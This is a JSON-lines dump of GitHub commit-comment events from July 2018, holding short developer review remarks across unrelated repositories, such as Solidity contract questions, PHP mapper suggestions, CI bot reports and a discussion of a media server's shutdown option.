{"id":"7979639092","type":"CommitCommentEvent","actor":{"login":"ericketts"},"repo":{"name":"BitMEX/sample-market-maker"},"payload":{"comment":{"id":29741780,"position":17,"line":49,"path":"test/websocket-apikey-auth-test.py","commit_id":"12ea6a005508176798cbfc957297b3cc94c06567","created_at":"2018-07-17T22:39:40Z","updated_at":"2018-07-17T22:39:40Z","author_association":"NONE","body":"This actually has to be `\"op\": \"authKeyExpires\"`"}},"created_at":"2018-07-17T22:39:40Z"}
{"id":"7979640355","type":"CommitCommentEvent","actor":{"login":"smilejwb"},"repo":{"name":"smilejwb/TIL"},"payload":{"comment":{"id":29741785,"position":null,"line":null,"path":null,"commit_id":"b9173f63ebdad8275b0049c1d0908bbbba4391ba","created_at":"2018-07-17T22:40:03Z","updated_at":"2018-07-17T22:40:03Z","author_association":"OWNER","body":"와~~ "}},"created_at":"2018-07-17T22:40:03Z"}
{"id":"7979647601","type":"CommitCommentEvent","actor":{"login":"jamesmbell"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29741799,"position":4,"line":37,"path":"libpyEM/libpyTypeConverter2.cpp","commit_id":"a6519991c11b9fb2ae30229fcdc4fba9aededdb0","created_at":"2018-07-17T22:42:16Z","updated_at":"2018-07-17T22:42:16Z","author_association":"CONTRIBUTOR","body":"It may not be. I can still compile on Linux without this and the following line."}},"created_at":"2018-07-17T22:42:16Z"}
{"id":"7979650455","type":"CommitCommentEvent","actor":{"login":"snryou"},"repo":{"name":"snryou/Hello_world"},"payload":{"comment":{"id":29741803,"position":null,"line":null,"path":null,"commit_id":"593f417b1bf689d2d9dcb6a3f1d5dda5d7162dc7","created_at":"2018-07-17T22:43:07Z","updated_at":"2018-07-17T22:43:07Z","author_association":"OWNER","body":"The first project for practice"}},"created_at":"2018-07-17T22:43:07Z"}
{"id":"7979651340","type":"CommitCommentEvent","actor":{"login":"gaming-hacker"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29741806,"position":null,"line":null,"path":null,"commit_id":"a4e16dbb046d89f9146dbc9408f2bfb96ec73a82","created_at":"2018-07-17T22:43:22Z","updated_at":"2018-07-17T22:43:22Z","author_association":"NONE","body":"\"High Sierra\", you have to be high to upgrade to that. I'm on 10.12.6 and will update once 10.14.1 comes out."}},"created_at":"2018-07-17T22:43:22Z"}
{"id":"7979651922","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29741807,"position":null,"line":null,"path":null,"commit_id":"f4f2f3b5de8261cfe0b443f414c7e7b37055aae8","created_at":"2018-07-17T22:43:33Z","updated_at":"2018-07-17T22:43:33Z","author_association":"NONE","body":"I think it is"}},"created_at":"2018-07-17T22:43:33Z"}
{"id":"7979653334","type":"CommitCommentEvent","actor":{"login":"ProgHaj"},"repo":{"name":"maakep/cgj2018"},"payload":{"comment":{"id":29741809,"position":null,"line":null,"path":null,"commit_id":"d938c5b7140f64075f80f78eeca74f10f15522ef","created_at":"2018-07-17T22:43:59Z","updated_at":"2018-07-17T22:43:59Z","author_association":"COLLABORATOR","body":"I was thinking about that but made it a weapon for now. It is usable as a weapon, it will spawn _bulletLimit shots and then not any more until the shots are destroyed. But it is not that viable of a weapon and it breaks the cooldown property.\r\n\r\nI don't think we should rely on the cooldown as I did in this code though. But the issue #25 about spawning multiple shots should solve that problem. We could then rely on weapons for abilities that creates some kind of multiple weapon attack without having to set the cooldown of the weapon to 0 as in this case."}},"created_at":"2018-07-17T22:43:59Z"}
{"id":"7979654020","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29741810,"position":5,"line":8,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T22:44:10Z","updated_at":"2018-07-17T22:44:10Z","author_association":"NONE","body":"How would it look like when implemented?"}},"created_at":"2018-07-17T22:44:10Z"}
{"id":"7979656680","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29741819,"position":79,"line":61,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T22:44:57Z","updated_at":"2018-07-17T22:44:57Z","author_association":"NONE","body":"So if you have an application written in C# that wants to create a hash, how do you do?"}},"created_at":"2018-07-17T22:44:57Z"}
{"id":"7979660943","type":"CommitCommentEvent","actor":{"login":"stalker314314"},"repo":{"name":"matiasdelellis/facerecognition"},"payload":{"comment":{"id":29741832,"position":15,"line":44,"path":"lib/Db/FaceMapper.php","commit_id":"942d8ef97e9453bbb1e27547c5d5da18b6de8ce3","created_at":"2018-07-17T22:46:11Z","updated_at":"2018-07-17T22:46:11Z","author_association":"NONE","body":"if you put $limit=null, you don't need additional if below, right? findEntities() method can handle null for limit?"}},"created_at":"2018-07-17T22:46:11Z"}
{"id":"7979661314","type":"CommitCommentEvent","actor":{"login":"beurdouche"},"repo":{"name":"project-everest/hacl-star"},"payload":{"comment":{"id":29741834,"position":null,"line":null,"path":null,"commit_id":"79de0e9a9a0da076275d041e8b8800e1b69f756f","created_at":"2018-07-17T22:46:17Z","updated_at":"2018-07-17T22:46:17Z","author_association":"MEMBER","body":"It is definitely a good trade off regarding everything F* breaks from HACL* without ever giving a F*.\r\nI am done spending half of my PhD time to follow and fix breakages caused by F*, sorry.\r\nI am sure Marina can tell you all about it... Anyways, you should discuss this with Karthik before investing some time in pushing changes. As you are one of the few people that actually do pay attention, I would be annoyed if you work for nothing... : )"}},"created_at":"2018-07-17T22:46:17Z"}
{"id":"7979662381","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29741836,"position":84,"line":66,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T22:46:37Z","updated_at":"2018-07-17T22:46:37Z","author_association":"NONE","body":"Yes, there is an `SLOAD` at the point of `payment.exchange`."}},"created_at":"2018-07-17T22:46:37Z"}
{"id":"7979662721","type":"CommitCommentEvent","actor":{"login":"stalker314314"},"repo":{"name":"matiasdelellis/facerecognition"},"payload":{"comment":{"id":29741837,"position":30,"line":58,"path":"lib/Db/FaceMapper.php","commit_id":"942d8ef97e9453bbb1e27547c5d5da18b6de8ce3","created_at":"2018-07-17T22:46:43Z","updated_at":"2018-07-17T22:46:43Z","author_association":"NONE","body":"limit can be in `findEntities`?"}},"created_at":"2018-07-17T22:46:43Z"}
{"id":"7979664113","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":29741841,"position":null,"line":null,"path":null,"commit_id":"d5fc3c2a3f178a25955d2f50a539611e8eba412a","created_at":"2018-07-17T22:47:08Z","updated_at":"2018-07-17T22:47:08Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#\nErrors:\n  * data should NOT have additional properties: \"taskId\"\n\n---\n\n* method:     createTask\n* errorCode:  InputValidationError\n* statusCode: 400\n* time:       2018-07-17T22:47:08.732Z\n\n</details>"}},"created_at":"2018-07-17T22:47:08Z"}
{"id":"7979665599","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29741847,"position":75,"line":76,"path":"test/Remittance.js","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T22:47:35Z","updated_at":"2018-07-17T22:47:35Z","author_association":"NONE","body":"https://github.com/b9lab/play-with-time/blob/master/test/piggyBank.js#L268"}},"created_at":"2018-07-17T22:47:35Z"}
{"id":"7979669017","type":"CommitCommentEvent","actor":{"login":"stalker314314"},"repo":{"name":"matiasdelellis/facerecognition"},"payload":{"comment":{"id":29741856,"position":20,"line":20,"path":"templates/fragments/content.php","commit_id":"942d8ef97e9453bbb1e27547c5d5da18b6de8ce3","created_at":"2018-07-17T22:48:37Z","updated_at":"2018-07-17T22:48:37Z","author_association":"NONE","body":"typo: patient:) "}},"created_at":"2018-07-17T22:48:37Z"}
{"id":"7979671154","type":"CommitCommentEvent","actor":{"login":"jsevern55"},"repo":{"name":"jsevern55/OmniUpdate"},"payload":{"comment":{"id":29741862,"position":null,"line":null,"path":null,"commit_id":"03ed48794101e9ad2df548ac474eb3e259048889","created_at":"2018-07-17T22:49:14Z","updated_at":"2018-07-17T22:49:14Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-17T22:49:14Z"}
{"id":"7979672433","type":"CommitCommentEvent","actor":{"login":"stalker314314"},"repo":{"name":"matiasdelellis/facerecognition"},"payload":{"comment":{"id":29741864,"position":null,"line":null,"path":null,"commit_id":"942d8ef97e9453bbb1e27547c5d5da18b6de8ce3","created_at":"2018-07-17T22:49:38Z","updated_at":"2018-07-17T22:49:38Z","author_association":"NONE","body":"I didn't go into logic that much, will leave it until you say you are done:)"}},"created_at":"2018-07-17T22:49:38Z"}
{"id":"7979673477","type":"CommitCommentEvent","actor":{"login":"tariqywsf"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29741867,"position":6,"line":145,"path":"app/src/main/java/com/example/android/pets/data/PetProvider.java","commit_id":"6861be56c0c5c3673f0a0b8a04922bfee823582b","created_at":"2018-07-17T22:49:58Z","updated_at":"2018-07-17T22:49:58Z","author_association":"NONE","body":"@eddyabraham if we make only toast , the pet will be accepted with no name and the app will show a brief toast about it."}},"created_at":"2018-07-17T22:49:58Z"}
{"id":"7979673813","type":"CommitCommentEvent","actor":{"login":"kelvinau"},"repo":{"name":"AshMenhennett/Forum"},"payload":{"comment":{"id":29741869,"position":null,"line":null,"path":null,"commit_id":"32f8b1604be420e484488fd7ad0890a2a3837624","created_at":"2018-07-17T22:50:04Z","updated_at":"2018-07-17T22:50:04Z","author_association":"NONE","body":"Are you implying that you want to support only PHP 7 then? I am just suggesting you to add it in README. Of course you don't need to take my suggestion. "}},"created_at":"2018-07-17T22:50:04Z"}
{"id":"7979767103","type":"CommitCommentEvent","actor":{"login":"Larbi-Ernst"},"repo":{"name":"Larbi-Ernst/Graphing-application"},"payload":{"comment":{"id":29742096,"position":50,"line":160,"path":"Graphs.py","commit_id":"c497a88ea25c26aed204825ca477500c854c6729","created_at":"2018-07-17T23:19:30Z","updated_at":"2018-07-17T23:19:30Z","author_association":"OWNER","body":"Altered the code for testing - noticed that a 'best-fit' function may have to be worked on in the near future as the code shall break if there isn't a corresponding equation."}},"created_at":"2018-07-17T23:19:30Z"}
{"id":"7979707452","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29741953,"position":null,"line":null,"path":null,"commit_id":"ac19e6f47f11449cab42f2629e21bfd0506908df","created_at":"2018-07-17T23:00:14Z","updated_at":"2018-07-17T23:00:14Z","author_association":"COLLABORATOR","body":"![image](https://user-images.githubusercontent.com/18150845/42849997-ecaef8c2-8a25-11e8-8bfe-95263e661fe5.png)\r\n"}},"created_at":"2018-07-17T23:00:14Z"}
{"id":"7979769881","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29742105,"position":null,"line":null,"path":null,"commit_id":"51a388694b597dc9af0a6fdaa9949f117f149bb1","created_at":"2018-07-17T23:20:28Z","updated_at":"2018-07-17T23:20:28Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2934 of 2943 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 9 tests had: EIO diffs.\n * 9 tests had: Table big diffs.\n * 2 tests had: ESO big diffs.\n * 1 test had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 614\n * Failed: 9\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.69%25-yellow.png)</a> \n"}},"created_at":"2018-07-17T23:20:28Z"}
{"id":"7979853299","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29742313,"position":12,"line":1386,"path":"src/main/java/net/pms/dlna/RootFolder.java","commit_id":"c0076bd4d3ea63824ed7d695f2ef26ad425a1a4c","created_at":"2018-07-17T23:49:35Z","updated_at":"2018-07-17T23:49:35Z","author_association":"CONTRIBUTOR","body":"I was playing with it before thinking that it mybe not need.\r\nAnyway i wasn't going to make nice or more code than that in Java."}},"created_at":"2018-07-17T23:49:35Z"}
{"id":"7979821350","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29742240,"position":12,"line":1386,"path":"src/main/java/net/pms/dlna/RootFolder.java","commit_id":"c0076bd4d3ea63824ed7d695f2ef26ad425a1a4c","created_at":"2018-07-17T23:38:05Z","updated_at":"2018-07-17T23:38:05Z","author_association":"CONTRIBUTOR","body":"I mean it work if i do that from my DOS windows but not from this code."}},"created_at":"2018-07-17T23:38:05Z"}
{"id":"7979823054","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29742243,"position":3,"line":1390,"path":"src/main/java/net/pms/dlna/RootFolder.java","commit_id":"6870a7e12fd4f34991cdfd3d2c5d570536d8df9b","created_at":"2018-07-17T23:38:41Z","updated_at":"2018-07-17T23:38:41Z","author_association":"CONTRIBUTOR","body":"Copy / paste ;P"}},"created_at":"2018-07-17T23:38:41Z"}
{"id":"7979713561","type":"CommitCommentEvent","actor":{"login":"AldoAbdn"},"repo":{"name":"AldoAbdn/AldoBot.js"},"payload":{"comment":{"id":29741969,"position":null,"line":null,"path":null,"commit_id":"169f70b5cb4cdd740a5ac430562e08c90915cad3","created_at":"2018-07-17T23:01:58Z","updated_at":"2018-07-17T23:01:58Z","author_association":"OWNER","body":"Editing for hosting on Heroku"}},"created_at":"2018-07-17T23:01:58Z"}
{"id":"7979824188","type":"CommitCommentEvent","actor":{"login":"peterjdev"},"repo":{"name":"Codeception/Stub"},"payload":{"comment":{"id":29742248,"position":null,"line":null,"path":null,"commit_id":"afa7fd28aff8953421214ae74e5a662e5d89e7bf","created_at":"2018-07-17T23:39:05Z","updated_at":"2018-07-17T23:39:05Z","author_association":"NONE","body":"Hi Naktibalda,\r\n\r\nThis commit caused a breaking change in my unit tests, and I haven't been able to figure out why. Any help would be useful. Thanks.\r\n\r\n`FATAL ERROR. TESTS NOT FINISHED.\r\nClass Mock_MyClass_39b870bd contains 1 abstract method and must therefore be declared abstract or implement the remaining methods (PHPUnit_Framework_MockObject_MockObject::__phpunit_setReturnValueGeneration)\r\nin /path/vendor/phpunit/phpunit-mock-objects/src/Framework/MockObject/Generator.php(290) : eval()'d code:1`"}},"created_at":"2018-07-17T23:39:05Z"}
{"id":"7979861156","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29742328,"position":12,"line":1386,"path":"src/main/java/net/pms/dlna/RootFolder.java","commit_id":"c0076bd4d3ea63824ed7d695f2ef26ad425a1a4c","created_at":"2018-07-17T23:52:29Z","updated_at":"2018-07-17T23:52:29Z","author_association":"CONTRIBUTOR","body":"> I was leaving the user the time to run to their computer to stop the shutdown if they changed mind ;)\r\n\r\nI think you need to give them more than 10 seconds to do that - they have to run to their computer, open a command prompt and then run `shutdown /a`. If they can do all that in 10 seconds, they are already so close to the computer that they can turn it of without DMS' help :wink: \r\n\r\n> I don't understand what you mean but \"Server Settings\" is not enabled by default i think.\r\nYes, I meant enable the shutdown command specifically."}},"created_at":"2018-07-17T23:52:29Z"}
{"id":"7979827217","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29742254,"position":4,"line":478,"path":"src/main/resources/i18n/messages.properties","commit_id":"07b0263345f5c6ef83dfc5a649b6a64e40cff47b","created_at":"2018-07-17T23:40:09Z","updated_at":"2018-07-17T23:40:09Z","author_association":"CONTRIBUTOR","body":"I hesitated to delete this branch just after i've pushed it...\r\nNo idea about label."}},"created_at":"2018-07-17T23:40:09Z"}
{"id":"7979783116","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29742135,"position":314,"line":605,"path":"extern/official_tf_resnet/resnet_model.py","commit_id":"f3020254755b640c60d9a20f93443cc44e04fe2c","created_at":"2018-07-17T23:24:56Z","updated_at":"2018-07-17T23:24:56Z","author_association":"MEMBER","body":"Remove."}},"created_at":"2018-07-17T23:24:56Z"}
{"id":"7979866802","type":"CommitCommentEvent","actor":{"login":"afuriza"},"repo":{"name":"afuriza/kyoukai_framework"},"payload":{"comment":{"id":29742334,"position":19,"line":19,"path":"src/ideintf/kyoukai_projectutil.pas","commit_id":"5a0405696455e393a76468b4c3a579be8e3a91fe","created_at":"2018-07-17T23:54:39Z","updated_at":"2018-07-17T23:54:39Z","author_association":"OWNER","body":"Unfinished project wizard based on FastPlaz. I don't know how to create a correct package, sorry."}},"created_at":"2018-07-17T23:54:39Z"}
{"id":"7979787114","type":"CommitCommentEvent","actor":{"login":"Nik2143"},"repo":{"name":"Nik2143/jdm"},"payload":{"comment":{"id":29742146,"position":null,"line":null,"path":null,"commit_id":"fd3a323ce6d5cad060bd5665c6061179e886e654","created_at":"2018-07-17T23:26:18Z","updated_at":"2018-07-17T23:26:18Z","author_association":"OWNER","body":"Added depositphotos"}},"created_at":"2018-07-17T23:26:18Z"}
{"id":"7979835808","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29742272,"position":89,"line":70,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T23:43:16Z","updated_at":"2018-07-17T23:43:16Z","author_association":"OWNER","body":"So the good Samaritan would have to provide some proof that he is authorized to claim the payment ?"}},"created_at":"2018-07-17T23:43:16Z"}
{"id":"7979872250","type":"CommitCommentEvent","actor":{"login":"monamimani"},"repo":{"name":"google/benchmark"},"payload":{"comment":{"id":29742345,"position":null,"line":null,"path":null,"commit_id":"a6a1b0d765b116bb9c777d45a299ae84a2760981","created_at":"2018-07-17T23:56:34Z","updated_at":"2018-07-17T23:56:34Z","author_association":"NONE","body":"scipy.stats.mannwhitneyu doesn't seem to be part of standard python.\r\nI just sync to head and when I try to use compare.py I get this error.\r\n\r\nTraceback (most recent call last):\r\n  File \"D:\\_Dev\\Playground\\gBenchmarkVulkan/bazel-gbenchmarkvulkan/external/gbenchmark/tools/compare.py\", line 11, in <module>\r\n    from gbench import util, report\r\n  File \"D:\\_Dev\\Playground\\gBenchmarkVulkan\\bazel-gbenchmarkvulkan\\external\\gbenchmark\\tools\\gbench\\report.py\", line 7, in <module>\r\n    from scipy.stats import mannwhitneyu\r\nImportError: No module named scipy.stats\r\n\r\nThe doc docs/tools.md should be modified with instruction to install the python package.\r\n"}},"created_at":"2018-07-17T23:56:34Z"}
{"id":"7979835455","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29742270,"position":12,"line":1386,"path":"src/main/java/net/pms/dlna/RootFolder.java","commit_id":"c0076bd4d3ea63824ed7d695f2ef26ad425a1a4c","created_at":"2018-07-17T23:43:10Z","updated_at":"2018-07-17T23:43:10Z","author_association":"CONTRIBUTOR","body":"There's no danger in using \"0\", the delay is how long it waits before it starts the shutdown procedure. When shutdown is initiated, Windows sends a signal to all applications to quite, and it then waits for them to quit. If some application doesn't quit withing a given time, Windows will ask the user if it should \"kill\" it. So, this might not end in a shutdown at all, and DMS will have the time to finish in the mean time.\r\n\r\nWhen it comes to the function itself I'm skeptical. I'm sure some users would appreciate it, but I can also see how it can cause issues. I think we'd need to make it so that it would have to be enabled first."}},"created_at":"2018-07-17T23:43:10Z"}
{"id":"7979733219","type":"CommitCommentEvent","actor":{"login":"Flynnn"},"repo":{"name":"psas/lv3.0-airframe"},"payload":{"comment":{"id":29742004,"position":null,"line":null,"path":null,"commit_id":"8bcf5d5671cca7807d8a9bdc5e0651303f3aec32","created_at":"2018-07-17T23:07:58Z","updated_at":"2018-07-17T23:07:58Z","author_association":"MEMBER","body":"How are unknown author commits even possible? Shouldn't there be a github account associated with whoever performed the push?"}},"created_at":"2018-07-17T23:07:58Z"}
{"id":"7979876339","type":"CommitCommentEvent","actor":{"login":"vgavro"},"repo":{"name":"dukegh/kyivstar"},"payload":{"comment":{"id":29742349,"position":null,"line":null,"path":null,"commit_id":"1c7747ba2dd742a72c41aa95527685ace5b75de3","created_at":"2018-07-17T23:58:05Z","updated_at":"2018-07-17T23:58:05Z","author_association":"NONE","body":"я сделал клон на питоне, может будет интересно глянуть. спс за этот бешенный реверс-инжиниринг)) https://github.com/vgavro/my-kyivstar"}},"created_at":"2018-07-17T23:58:05Z"}
{"id":"7979796563","type":"CommitCommentEvent","actor":{"login":"AlamGarciaAvaya"},"repo":{"name":"AlamGarciaAvaya/amv_kotlinbeta"},"payload":{"comment":{"id":29742174,"position":130,"line":162,"path":"app/src/main/java/com/example/alam/amv/LlamadaVideo.kt","commit_id":"b496e9ec991eadf14359adb1d9e40ffd967aa586","created_at":"2018-07-17T23:29:32Z","updated_at":"2018-07-17T23:29:32Z","author_association":"OWNER","body":"Listener para Mutear Audio"}},"created_at":"2018-07-17T23:29:32Z"}
{"id":"7979840650","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29742284,"position":4,"line":478,"path":"src/main/resources/i18n/messages.properties","commit_id":"07b0263345f5c6ef83dfc5a649b6a64e40cff47b","created_at":"2018-07-17T23:45:01Z","updated_at":"2018-07-17T23:45:01Z","author_association":"CONTRIBUTOR","body":"Ok. `PMS.151` is the only reference the translators have when they translate the string. I therefore try to make the labels informative."}},"created_at":"2018-07-17T23:45:01Z"}
{"id":"7979801232","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29742189,"position":35,"line":4781,"path":"TFNetworkLayer.py","commit_id":"efcf8a151633a515401d24d0c1455119ca5d34ed","created_at":"2018-07-17T23:31:01Z","updated_at":"2018-07-17T23:31:01Z","author_association":"MEMBER","body":"`block_sizes` does not have the same default value in `__init__`. This must always match."}},"created_at":"2018-07-17T23:31:01Z"}
{"id":"7979844769","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29742295,"position":5,"line":478,"path":"src/main/resources/i18n/messages.properties","commit_id":"c3e637ba94d49aa9db4162f5ed7869a3d8537c46","created_at":"2018-07-17T23:46:27Z","updated_at":"2018-07-17T23:46:27Z","author_association":"CONTRIBUTOR","body":"You could for example make the label `Action.ShutDown` instead. It will be more informative both in the code and at Crowdin :wink: "}},"created_at":"2018-07-17T23:46:27Z"}
{"id":"7979806360","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29742205,"position":11,"line":1385,"path":"src/main/java/net/pms/dlna/RootFolder.java","commit_id":"c0076bd4d3ea63824ed7d695f2ef26ad425a1a4c","created_at":"2018-07-17T23:32:48Z","updated_at":"2018-07-17T23:32:48Z","author_association":"CONTRIBUTOR","body":"Hehe, you know my Java skill, so it is a kind of copy/paste to make some test ;)\r\nYou are probably right +1"}},"created_at":"2018-07-17T23:32:48Z"}
{"id":"7979748920","type":"CommitCommentEvent","actor":{"login":"Flynnn"},"repo":{"name":"psas/lv3.0-airframe"},"payload":{"comment":{"id":29742043,"position":null,"line":null,"path":null,"commit_id":"8bcf5d5671cca7807d8a9bdc5e0651303f3aec32","created_at":"2018-07-17T23:13:12Z","updated_at":"2018-07-17T23:13:12Z","author_association":"MEMBER","body":"Joe, can you add me as a contributor? I currently can't make any modifications to the repo. Otherwise, I'd fix the directories."}},"created_at":"2018-07-17T23:13:12Z"}
{"id":"7979752121","type":"CommitCommentEvent","actor":{"login":"FilipiBrabo"},"repo":{"name":"BryanCruz/atari"},"payload":{"comment":{"id":29742051,"position":null,"line":null,"path":null,"commit_id":"85a374ff44a053c3f762bea8cfed74c20faef4c2","created_at":"2018-07-17T23:14:19Z","updated_at":"2018-07-17T23:14:19Z","author_association":"COLLABORATOR","body":"Janela pra verificar se o usuário realmente quer sair do programa."}},"created_at":"2018-07-17T23:14:19Z"}
{"id":"7979851609","type":"CommitCommentEvent","actor":{"login":"Joedang"},"repo":{"name":"psas/lv3.0-airframe"},"payload":{"comment":{"id":29742309,"position":null,"line":null,"path":null,"commit_id":"8bcf5d5671cca7807d8a9bdc5e0651303f3aec32","created_at":"2018-07-17T23:48:58Z","updated_at":"2018-07-17T23:48:58Z","author_association":"MEMBER","body":"You should already be able to commit, since you're part of the PSAS organization.\r\n\r\nThere are a few ways GitHub can check your identity when you try to push. You could, for example, use the same SSH key for multiple accounts. In that case, GH wouldn't be able to tell which account was pushing by the credentials alone. Thus, commits only get associated with an account if the username and email in the commit match an account. (If you use your own credentials on someone else's computer and don't use the `--author` option, it will default to *their* username and email. This is why Chris Clark shows up as a contributor.) **However**, Git itself shouldn't allow you to make author-less commits. If we look at the email associated with the commit, `bdech@LAPTOP-T7LKG5BR.localdomain`, I think it's a reasonable guess that this was done through a GUI client since this is obviously an automatically generated email."}},"created_at":"2018-07-17T23:48:58Z"}
{"id":"7979764457","type":"CommitCommentEvent","actor":{"login":"Larbi-Ernst"},"repo":{"name":"Larbi-Ernst/Graphing-application"},"payload":{"comment":{"id":29742088,"position":13,"line":70,"path":"Graphs.py","commit_id":"c497a88ea25c26aed204825ca477500c854c6729","created_at":"2018-07-17T23:18:32Z","updated_at":"2018-07-17T23:18:32Z","author_association":"OWNER","body":"This stores the equation of the curve as a string"}},"created_at":"2018-07-17T23:18:32Z"}
{"id":"7979764988","type":"CommitCommentEvent","actor":{"login":"kaushalmodi"},"repo":{"name":"gohugoio/hugo"},"payload":{"comment":{"id":29742091,"position":62,"line":2092,"path":"hugolib/page.go","commit_id":"d741064bebe2f4663a7ba12556dccc3dffe08629","created_at":"2018-07-17T23:18:44Z","updated_at":"2018-07-17T23:18:44Z","author_association":"CONTRIBUTOR","body":"Typo in error message: Ref -> RelRef"}},"created_at":"2018-07-17T23:18:44Z"}
{"id":"7979766660","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29742095,"position":5,"line":57,"path":"extern/official_tf_resnet/resnet_model.py","commit_id":"f3020254755b640c60d9a20f93443cc44e04fe2c","created_at":"2018-07-17T23:19:21Z","updated_at":"2018-07-17T23:19:21Z","author_association":"MEMBER","body":"When you add such an option, give it a default value, which is like the original behaviour, so that by default, it is still exactly the original ResNet code. In this case, I guess it is `conv_time_dim=False`.\r\n\r\nAlso, please document all the parameters."}},"created_at":"2018-07-17T23:19:21Z"}
{"id":"7979780372","type":"CommitCommentEvent","actor":{"login":"tomstewart89"},"repo":{"name":"tomstewart89/Callback"},"payload":{"comment":{"id":29742123,"position":null,"line":null,"path":null,"commit_id":"9aff30404ebf06cf39605b550fbc9d26b2a80fb9","created_at":"2018-07-17T23:23:59Z","updated_at":"2018-07-17T23:23:59Z","author_association":"OWNER","body":"LGTM, thanks for the PR! "}},"created_at":"2018-07-17T23:23:59Z"}
{"id":"7979840517","type":"CommitCommentEvent","actor":{"login":"JustCarolynElaine"},"repo":{"name":"JustCarolynElaine/JustCarolynElaine.github.io"},"payload":{"comment":{"id":29742283,"position":null,"line":null,"path":null,"commit_id":"2ed3a2693989ad8e140ec1d1cb3a4abccebc6b9b","created_at":"2018-07-17T23:44:59Z","updated_at":"2018-07-17T23:44:59Z","author_association":"OWNER","body":"updated linked CSS"}},"created_at":"2018-07-17T23:44:59Z"}
